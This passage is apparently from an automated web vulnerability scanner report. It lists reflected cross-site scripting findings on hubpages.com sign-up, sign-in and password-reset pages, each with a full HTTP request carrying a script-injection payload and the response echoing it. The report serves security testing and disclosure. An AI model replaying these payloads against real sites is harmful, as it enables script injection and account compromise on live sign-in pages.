Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...

1.16. http://hubpages.com/user/new/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...

1.17. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...

1.18. https://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.19. https://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...

1.20. https://hubpages.com/signin/ [explain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.21. https://hubpages.com/signin/ [explain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.22. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.23. https://hubpages.com/signin/ [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.24. https://hubpages.com/signin/ [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.25. https://hubpages.com/signin/ [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.26. https://hubpages.com/signin/ [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.27. https://hubpages.com/signin/reset/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...

1.28. https://hubpages.com/signin/reset/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
